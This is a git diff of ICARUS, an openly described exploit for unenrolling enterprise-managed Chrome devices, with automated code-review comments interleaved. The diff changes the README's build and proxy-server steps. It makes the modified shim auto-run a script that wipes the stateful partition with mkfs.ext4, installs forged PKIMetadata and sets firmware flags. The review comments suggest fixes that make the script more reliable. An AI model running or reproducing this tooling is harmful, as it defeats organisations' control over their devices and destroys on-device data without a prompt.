diff --git a/README.md b/README.md index 1cef0a9..8df0455 100644 --- a/README.md +++ b/README.md @@ -12,12 +12,15 @@ An exploit for Chrome devices which allows people to unenroll devices with devic ## Setup and installation instructions Clone the repo with ``git clone --recursive https://github.com/MunyDev/icarus/`` and change directory to it. -Set up the environment by running the following commands (Make sure you have both python3 and python3-venv installed beforehand): +Set up the environment by running the following commands (Make sure you have python3, python3-venv, and protobuf installed beforehand): - `make setup-venv` - `make enter-venv` - `make setup-python` - `make build-packed-data` + +Before continuing, open Chrome on your build machine and go to chrome://components. Press CTRL + F and search for "PKIMetadata". Once you find it, press "Check for Updates". Make sure it says up-to-date before continuing (and that the version is below 2000.) + - `bash get_original_data.sh` - `bash make_out.sh myCA.der` @@ -27,11 +30,7 @@ Now, to modify the shim with the generated PKIMetadata: - `bash modify.sh ` -Now boot the shim, and in the terminal of the shim, run these commands: - -`mount /dev/disk/by-label/STATE /mnt/stateful_partition` - -`bash /mnt/stateful_partition/usr/bin/inshim.sh` +Now boot the shim, and ICARUS will attempt to modify your stateful partition. ### Server setup Requirements: npm, node @@ -44,6 +43,21 @@ Reboot the device. You'll boot into verified mode. Once you have your server run - Set HTTPS IP to the IP you used to host the proxy server. - Resume setup and your device will unenroll. +## Troubleshooting + +
+ During building, everything starting from root was copied into original! + + Please run ``git pull`` on your local copy. This bug has been fixed. +
+ +
+ My device says "Can't reach Google"! + + - Make sure your device and the server are connected to the same network + - If that didn't work, powerwash your device and re-run the modified shim, and keep the server running. +
+ ## Credits - [MunyDev](https://github.com/MunyDev) - Creating this exploit - [Archimax](https://github.com/EnterTheVoid-x86) - Cleaning up get_original_data.sh and inshim.sh + README changes diff --git a/inshim.sh b/inshim.sh index 3a7c938..0325761 100644 --- a/inshim.sh +++ b/inshim.sh @@ -1,6 +1,11 @@ #!/bin/bash -[ "$EUID" -ne 0 ] && echo "Run this as root" +[ "$EUID" -ne 0 ] && fail "Not running as root, this shouldn't happen! Failing." + +fail() { + printf "%b\n" "$*" >&2 || : + sleep 1d +} get_largest_cros_blockdev() { local largest size dev_name tmp_size remo @@ -31,15 +36,17 @@ format_part_number() { mount /dev/disk/by-label/STATE /mnt/stateful_partition/ cros_dev="$(get_largest_cros_blockdev)" if [ -z "$cros_dev" ]; then - echo "No CrOS SSD found on device. Failing." - exit 1 + echo "No CrOS SSD found on device. Failing." + sleep 1d fi stateful=$(format_part_number "$cros_dev" 1) -mkfs.ext4 -F "$stateful" # This only wipes the stateful partition -mount "$stateful" /tmp +mkfs.ext4 -F "$stateful" || fail "Failed to wipe stateful." # This only wipes the stateful partition +mount "$stateful" /tmp || fail "Failed to mount stateful." mkdir -p /tmp/unencrypted cp /mnt/stateful_partition/usr/share/packeddata/. /tmp/unencrypted/ -rvf chown 1000 /tmp/unencrypted/PKIMetadata -R rm /tmp/.developer_mode umount /tmp -crossystem disable_dev_request=1 +crossystem disable_dev_request=1 || fail "Failed to set disable_dev_request." +read -p "Finished! Press enter to reboot." +reboot diff --git a/modify.sh b/modify.sh index e89a32e..c2c76eb 100644 --- a/modify.sh +++ b/modify.sh 
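Review bot: In inshim.sh the root check on the second line calls `fail` before the `fail() { … }` definition that follows it, so on a non-root run bash reports `fail: command not found` and the script carries on. Moving the function definition above the check fixes that. `fail` also never ends the script: once `sleep 1d` returns, control goes back to the caller, which affects every `|| fail …` added in the second hunk of this file too; an `exit 1` after the sleep would make the failure final. If the day-long sleep is there to keep the message on screen, a one-line comment saying so would help the next reader.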
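Review bot: The `No CrOS SSD found` branch in inshim.sh lost its `exit 1` and now only runs `sleep 1d`, so after the sleep the script continues to `format_part_number "$cros_dev" 1` and then `mkfs.ext4 -F "$stateful"` with whatever that helper returns for an empty device name. Keep the exit after the pause, `sleep 1d; exit 1`, so the format step can never run without a detected device. The first `mount /dev/disk/by-label/STATE …` and the `cp … -rvf` are still unchecked although the later steps gained `|| fail`, so a failed mount or copy goes unnoticed until after the partition has been formatted. `read -p` should be `read -r -p`, and `rm -f /tmp/.developer_mode` avoids an error message when the file is absent.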
@@ -84,14 +84,14 @@ mount -o rw "$LOOP_DEV"p1 "$MOUNT_DIR" mkdir -p "$MOUNT_DIR/usr/share/packeddata" cp -rvf "./out/." "$MOUNT_DIR/usr/share/packeddata" mkdir -p "$MOUNT_DIR"/usr/bin -cp "inshim.sh" "$MOUNT_DIR/usr/bin/inshim.sh" umount "$MOUNT_DIR" enable_rw_mount "$LOOP_DEV"p3 mount "$LOOP_DEV"p3 "$MOUNT_DIR" -echo "bash" > "$MOUNT_DIR/usr/sbin/factory_install.sh" +cp "inshim.sh" "$MOUNT_DIR/usr/sbin/factory_install.sh" +chmod +x "$MOUNT_DIR/usr/sbin/factory_install.sh" umount "$MOUNT_DIR" sync sync sync -echo "success!" \ No newline at end of file +echo "success!"
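Review bot: The new `cp "inshim.sh" "$MOUNT_DIR/usr/sbin/factory_install.sh"` replaces the interactive `bash` entry point, so per the README change in this commit the image now runs inshim.sh unattended, and that script formats the stateful partition without asking. This deserves a comment at the copy, for example `# replaces factory_install.sh: inshim.sh now runs on boot and wipes stateful without a prompt`. The copy's exit status is not checked before `echo "success!"`, and the source path is relative to the current directory. Whether an earlier `set -e` covers this cannot be seen from the hunk, which starts at line 84 of modify.sh. If it does not, `cp … || { umount "$MOUNT_DIR"; exit 1; }` keeps a failed build from reporting success.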